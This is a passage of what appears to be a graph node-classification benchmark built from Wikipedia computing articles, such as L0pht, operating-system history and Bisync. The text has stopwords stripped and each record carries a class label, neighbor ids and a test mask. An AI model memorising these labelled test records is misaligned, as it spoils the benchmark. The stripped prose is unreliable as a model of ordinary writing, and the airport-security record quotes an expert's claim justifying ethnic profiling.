israeli security officers interrogate travelers using racial profiling singling appear arab based name physical appearance additionally passengers even appear arab descent questioned traveling israel followed several general questions trip order search inconsistencies although numerous civil rights groups demanded end profiling israel maintains effective unavoidable according ariel merari israeli terrorism expert would foolish use profiling everyone knows terrorists come certain ethnic groups likely muslim young potential threat justifies inconveniencing certain ethnic group passengers leaving israel checked computerized list computers maintained israeli ministry interior connected israeli police fbi canadian security intelligence service csis scotland yard shin bet interpol order catch suspects others leaving country illegally despite tight security incident occurred november 17 2002 man apparently slipped airport security ben gurion airport pocketknife attempted storm cockpit el al flight 581 en route tel aviv istanbul turkey injuries reported attacker subdued guards hidden among passengers 15 minutes plane landed safely turkey authorities shut ben gurion time attack reassess security situation investigation opened determine man israeli arab managed smuggle knife past airport security conference may 2008 united states department homeland security secretary michael chertoff told reuters interviewers united states seek adopt israeli security measures domestic airports left post january 2009 mere 6 months statement may may enough time implement limited focus american airports turning israeli government israeli-run firms help upgrade security post-9/11 world israeli officials toured los angeles airport november 2008 re-evaluate airport making security upgrade recommendations 2006 calling ben gurion world safest airport antonio villaraigosa mayor los angeles implemented israeli review order bring state-of-the-art technology tactical measures help secure lax considered state primary terrorist target singled al qaeda network new age security solutions led former director security ben gurion based washington d.c. consults aviation security boston logan international airport u.s. airports incorporate israeli tactics systems include port oakland san diego county regional airport authority israelis legendary security opportunity see firsthand importantly theory behind said steven grossman director aviation port oakland impressed briefing presented israelis suggested trip israel u.s. branch airports council international order gain deeper understanding methods employed israeli airport security law enforcement pakistan airports security force asf responsible protecting airports facilities planes asf safeguards civil aviation industry unlawful interference adopting counter terrorism measures preventing crime maintaining law order within limits airports pakistan security country two international passenger airports comes purview airport police division singapore police force although resources concentrated singapore changi airport scheduled passenger traffic dominate seletar airport specializes handling non-scheduled training flights seen posing less security issue since september 11 attacks naming changi airport terrorism target jemaah islamiyah airport security stepped roving patrol teams two soldiers police officer armed automatic weapons patrol terminals random departing passengers checked entrance gate rather immigration clearance unlike hong kong international airport security measure easily noticed presence x-ray machines metal detectors every gate normally seen airports assisting state organizations security services provided ground handlers namely certis cisco singapore airport terminal services sats security services aetos security management private limited formed merger changi international airport services airport security unit companies become single island-wide auxiliary police company officers duties include screening luggage controlling movement restricted areas since 2005 upgrade screening technology rising security concerns led luggage-screening processes conducted behind closed doors plans also place install 400 cameras monitor airport discourage bomb attacks similar 2005 songkhla bombings southern thailand hat yai international airport targeted tenders incorporate system called late september 2005 since 8 may 2007 liquid restrictions 100 ml cap enforced following 2006 transatlantic aircraft plot passengers advised check liquids gels aerosols 100 ml failing confiscated airport security post back oneself anything security areas allowed general practice unacceptable materials also confiscated post back excluding nail clippers nail files umbrellas racquets prior 1970s american airports minimal security arrangements prevent acts terrorism measures introduced starting late 1960s several high-profile hijackings sky marshals introduced 1970 insufficient numbers protect every flight hijackings continued take place november 10 1972 trio hijackers threatened fly southern airways flight 49 nuclear reactor oak ridge national laboratory direct response incident federal aviation administration required airlines begin screening passengers carry-on baggage january 5 1973 screening generally contracted private security companies private companies would bid contracts airline operational control departure concourse controlled given checkpoint would hold contract although airline would control operation checkpoint oversight authority held faa c.f.r title 14 restrictions permit relevant airport authority exercise oversight checkpoint operations 1974 film parallax view shows early airport security checkpoint operation september 11 attacks prompted even tougher regulations limiting number types items passengers could carry board aircraft requiring increased screening passengers fail present government-issued photo id aviation transportation security act generally required november 19 2002 passenger screening must conducted federal employees result passenger baggage screening provided transportation security administration tsa part u.s. department homeland security provisions improve technology detecting explosives included terrorism prevention act 2004 often security category x airports u.s. largest busiest measured volume passenger traffic provided private contractors high volume passenger traffic category x airports considered vulnerable targets terrorism increase security screening airports saw long queues security checks alleviate airports created premium lines passengers traveling first business class elite members particular airline frequent flyer program screening passengers observation techniques spot program operating u.s. airports us specific",
    "neighbors": [
      2128,
      11126,
      8519,
      1823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8135,
    "label": 4,
    "text": "L0pht:l0pht l0pht heavy industries pronounced loft hacker collective active 1992 2000 located boston massachusetts area l0pht one first viable hackerspaces us pioneer responsible disclosure group famously testified front congress 1998 topic ‘ weak computer security government ’ second character name originally slashed zero symbol used old teletypewriters character mode operating systems mean zero modern online name including domain name therefore l0pht zero letter ø origin l0pht traced brian oblivion count zero two founding members sharing common loft space south boston wives ran hat business one half space experimented personal computers equipment purchased flea mit mit items obtained dumpster diving local places interest founded 1992 l0pht quickly became location members store computer hardware work various projects time members l0pht quit day jobs start business venture named l0pht heavy industries hacker think tank business released numerous security advisories also produced widely used software tools l0phtcrack password cracker windows nt pocsag decoder cd software collections 1997 august 8–10 mudge brian oblivion kingpin space rogue stefan weld pond john tan l0pht discussed recent projects accomplishments windows nt new projects emerging trends shortcomings technologies q session beyond hope puck building new york city october 1999 l0pht featured lengthy article new york times sunday magazine article jeffrey hunker nsc director information protection said l0pht objective basically help improve state art security gadfly speak january 2000 l0pht heavy industries merged startup stake completing l0pht slow transition underground organization whitehat computer security company symantec announced acquisition stake september 16 2004 completed transaction october 8 year march 14 2008 several members l0pht sat panel standing-room-only group infosec professionals source boston present weld pond john tan mudge space rogue silicosis dildog may 19 1998 seven members l0pht brian oblivion kingpin mudge space rogue stefan von neumann john tan weld pond famously testified congress united states could shut entire internet 30 minutes washington post referred response tragedy missed opportunity four members original group space rogue weld pond kingpin mudge held briefing entitled “ disaster foretold — ignored ” revisiting first-ever congressional cybersecurity hearing hosted congressional internet caucus academy briefing held may 22 2018 almost exactly 20 years original testimony streamed live via facebook defcon 26 hacking conference held august 10 2018 las vegas seven l0pht members sat panel entitled l0pht testimony 20 years later things afraid ask among things panel encouraged attendees keep hacking stay side law kept jail general counsel national security agency glenn s. gerstell quoted testimony l0pht ’ hearing keynote american bar association ’ 28th annual review field national security law conference november 1 2018 l0pht occupied physical space real expenses electricity phone internet access rent early l0pht history costs evenly divided among l0pht members fact l0pht originally shared space hat-making business run spouses brian oblivion count zero rental cost divided amongst soon subsidized profits made selling old hardware monthly mit electronic flea market summer occasionally shell accounts offered low cost l0pht.com server selected individuals individuals access l0pht.com server members l0pht one first physical products sold profit l0pht pocsag decoder kit sold kit assembled form subsequently whacked mac archives transferred cd-rom sale soon followed cd copies black crawling system archives command line version l0phtcrack password cracker windows nt given away free gui version sold commercial product followed creation hacker news network website host advertisements however even sources income l0pht barely broke even eventually began custom security coding companies like nfr january 2009 l0phtcrack acquired original authors zatko wysopal rioux symantec l0phtcrack 6 released source boston conference march 11 2009 l0phtcrack 6 contains support 64-bit windows platforms well upgraded rainbow tables support l0pht membership varied included various times",
    "neighbors": [
      9217,
      9569,
      3619,
      6916,
      1861,
      10914,
      10279,
      5512,
      8976,
      10110,
      1525,
      5111,
      8827,
      4956,
      7741,
      9214
    ],
    "mask": "None"
  },
  {
    "node_id": 8136,
    "label": 2,
    "text": "History_of_operating_systems:history operating systems computer operating systems oses provide set functions needed used application programs computer links needed control synchronize computer hardware first computers operating system every program needed full hardware specification run correctly perform standard tasks drivers peripheral devices like printers punched paper card readers growing complexity hardware application programs eventually made operating systems necessity everyday use earliest computers mainframes lacked form operating system user sole use machine scheduled period time would arrive computer program data often punched paper cards magnetic paper tape program would loaded machine machine would set work program completed crashed programs could generally debugged via control panel using dials toggle switches panel lights symbolic languages assemblers compilers developed programmers translate symbolic program-code machine code previously would hand-encoded later machines came libraries support code punched cards magnetic tape would linked user program assist operations input output genesis modern-day operating system however machines still ran single job time cambridge university england job queue one time washing line tapes hung different colored clothes-pegs indicate job-priority machines became powerful time run programs diminished time hand equipment next user became large comparison accounting paying machine usage moved checking wall clock automatic logging computer run queues evolved literal queue people door heap media jobs-waiting table batches punch-cards stacked one top reader machine able select sequence magnetic tape drives processed tapes program developers originally access run jobs machine supplanted dedicated machine operators looked machine less less concerned implementing tasks manually commercially available computer centers faced implications data lost tampering operational errors equipment vendors put pressure enhance runtime libraries prevent misuse system resources automated monitoring needed cpu usage counting pages printed cards punched cards read disk storage used signaling operator intervention required jobs changing magnetic tapes paper forms security features added operating systems record audit trails programs accessing files prevent access production payroll file engineering program example features building towards repertoire fully capable operating system eventually runtime libraries became amalgamated program started first customer job could read customer job control execution record usage reassign hardware resources job ended immediately go process next job resident background programs capable managing multistep processes often called monitors monitor-programs term operating system established underlying program offering basic hardware-management software-scheduling resource-monitoring may seem remote ancestor user-oriented oses personal computing era shift meaning os early automobiles lacked speedometers radios air-conditioners later became standard optional software features became standard features every os package although applications database management systems spreadsheets remain optional separately priced led perception os complete user-system integrated graphical user interface utilities applications text editors file managers configuration tools true descendant early operating systems called kernel technical development circles old restricted sense os persists continued active development embedded operating systems kinds devices data-processing component hand-held gadgets industrial robots real-time control-systems run user applications front-end embedded os device today far removed one might think ancestor 1950s broader categories systems application software discussed computer software article first operating system used real work gm-naa i/o produced 1956 general motors research division ibm 704 early operating systems ibm mainframes also produced customers early operating systems diverse vendor customer producing one operating systems specific particular mainframe computer every operating system even vendor could radically different models commands operating procedures facilities debugging aids typically time manufacturer brought new machine would new operating system applications would manually adjusted recompiled retested state affairs continued 1960s ibm already leading hardware vendor stopped work existing systems put effort developing system/360 series machines used instruction input/output architecture ibm intended develop single operating system new hardware os/360 problems encountered development os/360 legendary described fred brooks mythical man-month —a book become classic software engineering performance differences across hardware range delays software development whole family operating systems introduced instead single os/360 ibm wound releasing series stop-gaps followed two longer-lived operating systems ibm maintained full compatibility past programs developed sixties still run z/vse developed dos/360 z/os developed mft mvt change ibm also developed tss/360 time-sharing system system/360 model 67 overcompensating perceived importance developing timeshare system set hundreds developers work project ended bloated buggy project took long boot crash ended project without releasing several operating systems ibm s/360 s/370 architectures developed third parties including michigan terminal system mts music/sp control data corporation developed scope operating systems 1960s batch processing later developed mace operating system time sharing basis later kronos cooperation university minnesota kronos later nos operating systems developed 1970s supported simultaneous batch timesharing use like many commercial timesharing systems interface extension dtss time sharing system one pioneering efforts timesharing programming languages late 1970s control data university illinois developed plato system used plasma panel displays long-distance time sharing networks plato remarkably innovative time shared memory model plato tutor programming language allowed applications real-time chat multi-user graphical games univac 1107 univac first commercial computer manufacturer produced exec operating system computer sciences corporation developed exec ii operating system delivered univac exec ii ported univac 1108 later univac developed exec 8 operating system 1108 basis operating systems later members family like early mainframe systems exec exec ii batch-oriented system managed magnetic drums disks card readers line printers exec 8 supported batch processing on-line transaction processing 1970s univac produced real-time basic rtb system support large-scale time sharing also patterned dartmouth basic system burroughs corporation introduced b5000 1961 mcp master control program operating system b5000 stack machine designed exclusively support high-level languages software even lowest level operating system written directly machine language assembly language mcp first os written entirely high-level language espol dialect algol 60 although espol specialized statements syllable b5000 instruction set mcp also introduced many ground-breaking innovations one first commercial implementations virtual memory rewrite mcp b6500 still use today unisys clearpath/mcp line computers ge introduced ge-600 series general electric comprehensive operating supervisor gecos operating system 1962 honeywell acquired ge computer business renamed general comprehensive operating system gcos honeywell expanded use gcos name cover operating systems 1970s though many computers nothing common earlier ge 600 series operating systems derived original gecos project mac mit working ge bell labs developed multics introduced concept ringed security privilege levels digital equipment corporation developed tops-10 pdp-10 line 36-bit computers 1967 widespread use unix tops-10 particularly popular system universities early arpanet community bolt beranek newman developed tenex modified pdp-10 supported demand paging another popular system research arpanet communities later developed dec tops-20 scientific data systems/xerox data systems developed several operating systems sigma series computers basic control monitor bcm batch processing monitor bpm basic time-sharing monitor btm later bpm btm succeeded universal time-sharing system uts designed provide multi-programming services online interactive user programs addition batch-mode production jobs succeeded cp-v operating system combined uts heavily batch-oriented xerox operating system digital equipment corporation created several operating systems 16-bit pdp-11 machines including simple rt-11 system time-sharing rsts operating systems rsx-11 family real-time operating systems well vms system 32-bit vax machines several competitors digital equipment corporation data general hewlett-packard computer automation created operating systems one max iii developed modular computer systems modcomp ii modcomp iii computers characterised target market industrial control market fortran libraries included one enabled access measurement control devices ibm key innovation operating systems class call mid-range cpf system/38 capability-based addressing used machine interface architecture isolate application software operating system hardware dependencies including even details address size register size included integrated rdbms succeeding os/400 as/400 files objects different types objects persist large flat virtual memory called single-level store i5/os later ibm iseries continue line operating system unix operating system developed bell laboratories late 1960s originally pdp-7 later pdp-11 essentially free early editions easily obtainable easily modified achieved wide acceptance also became requirement within bell systems operating companies since written c language language ported new machine architecture unix also able ported portability permitted become choice second generation minicomputers first generation workstations widespread use exemplified idea operating system conceptually across various hardware platforms later became one roots free software open-source software operating system projects including gnu linux berkeley software distribution apple macos also based unix via nextstep freebsd pick operating system another operating system available wide variety hardware brands commercially released 1973 core basic-like language called data/basic sql-style database manipulation language called english licensed large variety manufacturers vendors early 1980s observers saw pick operating system strong competitor unix beginning mid-1970s new class small computers came onto marketplace featuring 8-bit processors typically mos technology 6502 intel 8080 motorola 6800 zilog z80 along rudimentary input output interfaces much ram practical systems started kit-based hobbyist computers soon evolved essential business tool many eight-bit home computers 1980s bbc micro commodore 64 apple ii series atari 8-bit amstrad cpc zx spectrum series others could load third-party disk-loading operating system cp/m geos generally used without one built-in operating systems designed era floppy disk drives expensive expected used users standard storage device tape drive using standard compact cassettes computers shipped built-in basic interpreter rom also served crude command line interface allowing user load separate disk operating system perform file management commands load save disk popular home computer commodore 64 notable exception dos rom disk drive hardware drive addressed identically printers modems external devices furthermore systems shipped minimal amounts computer memory—4-8 kilobytes standard early home computers—as well 8-bit processors without specialized support circuitry like mmu even dedicated real-time clock hardware complex operating system overhead supporting multiple tasks users would likely compromise performance machine without really needed systems largely sold complete fixed hardware configuration also need operating system provide drivers wide range hardware abstract away differences video games even available spreadsheet database word processors home computers mostly self-contained programs took machine completely although integrated software existed computers usually lacked features compared standalone equivalents largely due memory limitations data exchange mostly performed standard formats like ascii text csv specialized file conversion programs since virtually video game consoles arcade cabinets designed built 1980 true digital machines based microprocessors unlike earlier pong clones derivatives carried minimal form bios built-in game colecovision sega master system snk neo geo modern-day game consoles videogames starting pc-engine minimal bios also provides interactive utilities memory card management audio video cd playback copy protection sometimes carry libraries developers use etc cases however would qualify true operating system notable exceptions probably dreamcast game console includes minimal bios like playstation load windows ce operating system game disk allowing easily porting games pc world xbox game console little disguised intel-based pc running secret modified version microsoft windows background furthermore linux versions run dreamcast later game consoles well long sony released kind development kit called net yaroze first playstation platform provided series programming developing tools used normal pc specially modified black playstation could interfaced pc download programs operations require general functional os platforms involved general said videogame consoles arcade coin-operated machines used built-in bios 1970s 1980s 1990s playstation era beyond started getting sophisticated point requiring generic custom-built os aiding development expandability development microprocessors made inexpensive computing available small business hobbyist turn led widespread use interchangeable hardware components using common interconnection s-100 ss-50 apple ii isa pci buses increasing need standard operating systems control important early oses machines digital research cp/m-80 8080 8085 z-80 cpus based several digital equipment corporation operating systems mostly pdp-11 architecture microsoft first operating system mdos/midas designed along many pdp-11 features microprocessor based systems ms-dos pc dos supplied ibm designed similar cp/m-80 machines small boot program rom loaded os disk bios ibm-pc class machines extension idea accreted features functions 20 years since first ibm-pc introduced 1981 decreasing cost display equipment processors made practical provide graphical user interfaces many operating systems generic x window system provided many unix systems graphical systems apple classic mac os macos radio shack color computer os-9 level ii/multivue commodore amigaos atari tos ibm os/2 microsoft windows original gui developed xerox alto computer system xerox palo alto research center early 1970s commercialized many vendors throughout 1980s 1990s since late 1990s three operating systems widespread use personal computers apple inc. macos open source linux microsoft windows since 2005 apple transition intel processors developed mainly x86 platform although macos retained powerpc support 2009 linux remains ported multitude architectures including ones 68k pa-risc dec alpha long superseded production sparc mips used servers embedded systems longer desktop computers operating systems amigaos os/2 remain use mainly retrocomputing enthusiasts specialized embedded applications early 1990s psion released psion series 3 pda small mobile computing device supported user-written applications running operating system called epoc later versions epoc became symbian operating system used mobile phones ericsson motorola nokia 1996 palm computing released pilot 1000 pilot 5000 running palm os microsoft windows ce base pocketpc 2000 renamed windows mobile 2003 peak 2007 common operating system smartphones u.s 2007 apple introduced iphone operating system ios like mac os x based unix-like darwin addition underpinnings also introduces powerful innovative graphic user interface – later also used tablet computer ipad year later android introduced based modified linux kernel graphical user interface microsoft re-entered market windows phone 2010 due replaced windows 10 mobile 2015 addition wide range mobile operating systems contending area operating systems originally ran directly hardware provided services applications virtualization operating system runs control hypervisor instead direct control hardware mainframes ibm introduced notion virtual machine 1968 cp/cms ibm system/360 model 67 extended later 1972 virtual machine facility/370 vm/370 system/370 x86-based personal computers vmware popularized technology 1999 product vmware workstation 2001 vmware gsx server vmware esx server products later wide range products others including xen kvm hyper-v meant 2010 reported 80 percent enterprises virtualization program project place 25 percent server workloads would virtual machine time line virtual machines monitors operating systems blurred many ways virtual machine software today plays role formerly held operating system including managing hardware resources processor memory i/o devices applying scheduling policies allowing system administrators manage system",
    "neighbors": [
      2560,
      6148,
      9732,
      6153,
      6155,
      6675,
      7187,
      10776,
      25,
      9756,
      4637,
      11295,
      5154,
      4643,
      6180,
      9762,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      7234,
      3142,
      1610,
      6221,
      5714,
      86,
      9302,
      3160,
      11356,
      10333,
      97,
      11363,
      9829,
      6248,
      6760,
      8298,
      9835,
      10856,
      7281,
      6772,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      1702,
      8879,
      3248,
      178,
      9907,
      6325,
      6837,
      6329,
      8889,
      5823,
      1219,
      8388,
      5318,
      6342,
      1736,
      2248,
      9932,
      5840,
      2259,
      7382,
      8410,
      10458,
      9436,
      1247,
      11489,
      1253,
      7403,
      1776,
      8944,
      242,
      2290,
      5363,
      8439,
      5368,
      9466,
      2811,
      3323,
      7421,
      1278,
      9468,
      10499,
      5384,
      1804,
      10508,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      1304,
      8474,
      10016,
      292,
      295,
      10235,
      2345,
      7983,
      10543,
      2355,
      7477,
      823,
      10040,
      4409,
      6459,
      7483,
      7999,
      321,
      11075,
      4423,
      5452,
      6988,
      11596,
      2383,
      5457,
      11601,
      7507,
      11604,
      2901,
      7511,
      10590,
      1376,
      3426,
      868,
      8551,
      5484,
      2925,
      7020,
      11635,
      372,
      2933,
      5492,
      1399,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      6539,
      7057,
      11153,
      11667,
      11673,
      11675,
      8092,
      2462,
      5022,
      1952,
      421,
      1445,
      935,
      4521,
      9643,
      2477,
      4525,
      11184,
      7601,
      8625,
      10676,
      9655,
      5562,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      9166,
      8143,
      477,
      10730,
      1515,
      10731,
      8687,
      6128,
      5105,
      6129,
      499,
      5619,
      5115,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8137,
    "label": 2,
    "text": "Gecos_field:gecos field gecos field gecos field entry /etc/passwd file unix similar operating systems typically used record general information account user real name phone number typical format gecos field comma-delimited list order unix systems non-root users change information using chfn chsh command early unix systems bell labs used gecos machines print spooling various services field added carry information user gecos identity internet relay chat irc real name field commonly referred gecos field irc clients required supply field connecting hexchat x-chat fork defaults 'realname talksoup.app gnustep defaults 'john doe irssi reads operating system user full name replacing 'unknown defined irc clients use field advertising example znc defaulted got znc changed realname match configuration syntax 2015",
    "neighbors": [
      3937,
      5251,
      3916,
      7983,
      8304,
      11153,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 8138,
    "label": 5,
    "text": "Binary_Synchronous_Communications:binary synchronous communications binary synchronous communication bsc bisync ibm character-oriented half-duplex link protocol announced 1967 introduction system/360 replaced synchronous transmit-receive str protocol used second generation computers intent common link management rules could used three different character encodings messages six-bit transcode looked backwards older systems usascii 128 characters ebcdic 256 characters looked forward transcode disappeared quickly ebcdic usascii dialects bisync continued use one time bisync widely used communications protocol still limited use 2013 bisync differs protocols succeeded complexity message framing later protocols use single framing scheme messages sent protocol hdlc digital data communications message protocol ddcmp point-to-point protocol ppp etc different framing schemes one frame format exists within specific protocol bisync five different framing formats ack0 ack1 even/odd affirmative acknowledgement encoded two characters—dle '70 x dle ebcdic dle 0 dle 1 usasii dle dle transcode wabt wait transmit encoded dle dle dle w. frame formats begin least two syn bytes binary form syn byte property rotation byte equal original allows receiver find beginning frame searching received bit stream syn pattern found tentative byte synchronization achieved next character also syn character synchronization achieved receiver searches character start frame characters outside set described leading graphics sometimes used identify sender frame long messages syn bytes inserted approximately every second maintain synchronization ignored receiver normal block ending character etb etx followed check sum block check character bcc usascii one character longitudinal redundancy check lrc transcode ebcdic check sum two character cyclic redundancy check crc data frame may contain intermediate check sum preceded itb character ability include intermediate check sums long data frame allows considerable improvement error detection probability usascii characters also transmitted using odd parity additional checking pad characters required following line turn-around—nak eot enq ack0 ack1 transmission ends eot etx pad follows bcc pad either 1 bits alternating 0 1 bits next transmission begins pad character either syn optional heading containing control information precede data frame content heading defined protocol defined specific device heading present preceded soh start heading character followed stx start text text data normally follows heading begun stx terminated etx end text etb end transmission block normal data frames allow certain characters appear data block ending characters etb etx enq itb syn characters number unique characters transmitted therefore limited 59 transcode 123 usascii 251 ebcdic transparent data framing provides unrestricted alphabet 64 128 256 characters transparent mode block framing characters etb etx syn preceded dle character indicate control significance dle character represented sequence dle dle technique became known character stuffing analogy bit stuffing link control protocol similar str designers attempted protect simple transmission errors protocol requires every message acknowledged ack0/ack1 negatively acknowledged nak transmission small packets high transmission overhead protocol recover corrupted data frame lost data frame lost acknowledgment error recovery retransmission corrupted frame since bisync data packets serial-numbered considered possible data frame go missing without receiver realizing therefore alternating ack0s ack1s deployed transmitter receives wrong ack assume data packet ack went missing potential flaw corruption ack0 ack1 could result duplication data frame error protection ack0 ack1 weak hamming distance two messages two bits protocol half-duplex 2-wire environment packets frames transmission strictly unidirectional necessitating 'turn-around even simplest purposes acknowledgments turn-around involves 2-wire environment causes noticeable round-trip delay reduces performance datasets support full-duplex operation full-duplex 4-wire used many circumstances improve performance eliminating turn-around time added expense 4-wire installation support typical full-duplex data packets transmitted along one wire pair acknowledgements returned along much bisync traffic point-to-point point-to-point lines optionally use contention determine master station case one device transmit enq bid control device reply ack0 accept bid prepare receive nak wabt refuse cases connection terminal multiple hosts possible via dial telephone network multi-drop part initial bisync protocol master station normally computer sequentially poll terminals attached via analog bridges communication line accomplished sending message consisting enq character addressed device turn selected station transmits message master reply eot indicate data transmit original purpose bisync batch communications system/360 mainframe another mainframe remote job entry rje terminal ibm 2780 ibm 3780 rje terminals support limited number data formats punched card images print line images terminal non-ibm hardware vendors mohawk data sciences used bisync purposes tape-to-tape transmission programmer easily emulate rje terminal device ibm offered assembler language macros provide programming support system/360 era access methods btam basic telecommunications access method qtam queued telecommunications access method – later replaced telecommunications access method tcam ibm introduced vtam virtual telecommunications access method system/370 teleprocessing monitors ibm cics third-party software remote ducs display unit control system westi platforms used bisync line control communicate remote devices academic computing network bitnet together connecting networks geographic areas used bisync connect 3000 computer systems peak financial network s.w.i.f.t used bsc protocol communication regional center institution bank server leased line mid-1990 bsc replaced x.25 infrastructure important systems use bisync data framing different link control protocol houston automated spooling program hasp uses bisync half-duplex hardware conjunction link control protocol provide full-duplex multi-datastream communication small computer mainframe running hasp bisync terms conversational mode early x.25 networks tolerated connection scheme transparent bisync data frames encapsulated hdlc lapb data control packets several vendors encapsulate bisync transmissions within tcp/ip data streams bisync began displaced 1970s systems network architecture sna allows construction network multiple hosts multiple programs using telecommunications x.25 internet protocol later protocols like sna provide mere link control large number devices use bisync protocol",
    "neighbors": [
      5472,
      4546,
      4586,
      1997,
      10094,
      47,
      5071,
      8432,
      11217,
      3443,
      10072,
      5021,
      8606
    ],
    "mask": "None"
  },
  {
    "node_id": 8139,
    "label": 7,
    "text": "Apache_SystemML:apache systemml apache systemml flexible machine learning system automatically scales spark hadoop clusters systemml's distinguishing characteristics systemml created 2010 researchers ibm almaden research center led ibm fellow shivakumar vaithyanathan observed data scientists would write machine learning algorithms languages r python small data came time scale big data systems programmer would needed scale algorithm language scala process typically involved days weeks per iteration errors would occur translating algorithms operate big data systemml seeks simplify process primary goal systemml automatically scale algorithm written r-like python-like language operate big data generating answer without error-prone multi-iterative translation approach june 15 2015 spark summit san francisco beth smith general manager ibm analytics announced ibm open-sourcing systemml part ibm major commitment apache spark spark-related projects systemml became publicly available github august 27 2015 became apache incubator project november 2 2015 may 17 2017 apache software foundation board approved graduation apache systemml apache top level project",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      1913,
      8217,
      6555,
      8860,
      11161,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      823,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      5833,
      5066,
      7750,
      4944,
      1363,
      11221,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8554,
      747,
      8810,
      2163,
      6774,
      7159,
      3705,
      1018,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8140,
    "label": 9,
    "text": "O-code:o-code o-code intermediate language emitted bcpl compiler compiled machine code computer intended run program method compiling allowed original bcpl compiler ported new machines easily result became widespread idea since used many recent compilers however interpret equivalent o-code virtual machine rather compiling originally case o-code machine virtual machine developed martin richards late 1960s give machine independence bcpl low-level forerunner c c++ concept behind o-code machine create o-code output stands object bcpl compiler o-code either interpreted normally compiled machine specific code idea used later compilers p-code pascal compilers bytecode generated jvm java compilers o-code allowed richards separate general compilation issues machine specific implementation issues writing bcpl compiler use bcpl compiler made compiler easy port result bcpl quickly became available many machines",
    "neighbors": [
      6242,
      8868,
      1349,
      8262,
      8524,
      5677,
      10638,
      10703,
      5872,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8141,
    "label": 4,
    "text": "Sagan_(software):sagan software sagan open source gnu/gplv2 multi-threaded high performance real-time log analysis correlation engine developed quadrant information security runs unix operating systems written c uses multi-threaded architecture deliver high performance log event analysis sagan structure rules work similarly sourcefire snort ids/ips engine allows sagan compatible snort rule management software give sagan ability correlate snort ids/ips data sagan record events snort unified2 output format makes sagan compatible user interfaces snorby sguil base proprietary consoles sagan supports different output formats reporting analysis log normalization script execution event detection automatic firewall support via snortsam geoip detection/alerting multi-line log support time sensitive alerting",
    "neighbors": [
      3714,
      7813,
      7983,
      5492,
      5245,
      2045,
      3486
    ],
    "mask": "None"
  },
  {
    "node_id": 8142,
    "label": 8,
    "text": "Protein_Structure_Evaluation_Suite_&_Server:protein structure evaluation suite amp server protein structure evaluation suite server prosess freely available web server protein structure validation designed university alberta assist process evaluating validating protein structures solved nmr spectroscopy structure validation particularly important component structure determination pipeline many protein structures small structural errors i.e distorted bond lengths angles incompatible torsion angles overlapping atoms easily detected visual inspection protein structures solved nmr spectroscopy large numbers structures generated coordinate inaccuracies common problem particularly acute nmr-based structure validation protocols primarily use noe nuclear overhauser enhancement j-coupling residual dipolar coupling rdc data assess validate structures particular try assess agreement experimentally observed calculated noes rdcs and/or j-couplings good agreement calculated observed parameters normally indicates good structure methods structure validation procheck molprobity resprox vadar focus measuring coordinate data rather experimental data assess quality bond torsion angle geometry prosess unique among structure validation servers evaluates coordinate quality experimental data quality prosess also able use nmr chemical shifts well noes assess validate protein structures chemical shifts easily precisely measurable nmr observables provide great deal information protein structure dynamics see protein chemical shift prediction specifically prosess assesses agreement observed chemical shifts shiftx-predicted ha ca cb n c hn nmr chemical shifts addition ability validate structures using chemical shifts prosess also checks many protein structure parameters including covalent bond quality non-covalent bond atomic packing quality torsion angle quality noe quality i.e measuring model agreement noe-based distance restraints total 8 different programs see prosess sub-programs used prosess evaluation validation process prosess handle single-chain x-ray models multi-chain x-ray models single-chain nmr ensembles multi-chain nmr ensembles monomeric multimeric proteins addition able validate nmr protein structures prosess used validate evaluate protein model regardless solved x-ray nmr comparative modelling etc. prosess generates detailed colorful structure validation report including tables color-coded images graphs bar charts many tables contain embedded hyperlinks additional details explanations graphs charts prosess uses simple rag red amber green color scheme indicate quality different structure parameters protein whole different members structure ensemble specific residues specific atoms different shades red indicate serious problems different shades yellow amber indicate potential problems different shades green indicate protein model residues/atoms free problems color also assigned number ranging 0 9with 0 bad 9 excellent structure quality assessment quantifiable prosess quality indices quality color scales designed specifically help non-structural biologists easily rapidly understand protein structure validation reports",
    "neighbors": [
      225
    ],
    "mask": "Test"
  },
  {
    "node_id": 8143,
    "label": 3,
    "text": "Operand:operand mathematics operand object mathematical operation i.e. object quantity operated following arithmetic expression shows example operators operands example '+ symbol operation called addition operand 3 one inputs quantities followed addition operator operand 6 input necessary operation result operation 9 number 9 also called sum augend 3 addend 6 operand also referred one inputs quantities operation operands may complex may consist expressions also made operators operands expression 3 5 first operand multiplication operator 2 second operand 3 5 expression contains addition operator operands 3 5 rules precedence affect values form operands operators expression multiplication operator higher precedence addition operator multiplication operator operands 5 2 addition operator operands 3 5 × 2 depending mathematical notation used position operator relation operand may vary everyday usage infix notation common however notations also exist prefix postfix notations alternate notations common within computer science comparison three different notations — represent addition numbers 1 2' mathematical expression order operation carried left right start leftmost value seek first operation carried accordance order specified i.e. start parentheses end addition/subtraction group example expression first operation acted upon expressions found inside parenthesis beginning left moving right find first case parenthesis 2 2 within parenthesis found expression 2 reader required find value 2 going value 2 4 found value remaining expression looks like next step calculate value expression inside parenthesis 2 4 6 expression looks like calculated parenthetical part expression start beginning left value move right next order operation according rules exponents start left value 4 scan eyes right search first exponent come across first expression come across expressed exponent 2 find value 2 4 left expression next order operation multiplication 4 × 4 16 expression looks like next order operation according rules division however division operator sign ÷ expression 16 − 6 move next order operation i.e. addition subtraction precedence done left right correct value original expression 4 × 2 − 2 2 10 important carry order operation accordance rules set convention reader evaluates expression follow correct order operation reader come forth different value different value incorrect value order operation followed reader arrive correct value expression operation carried proper order number operands operator called arity based arity 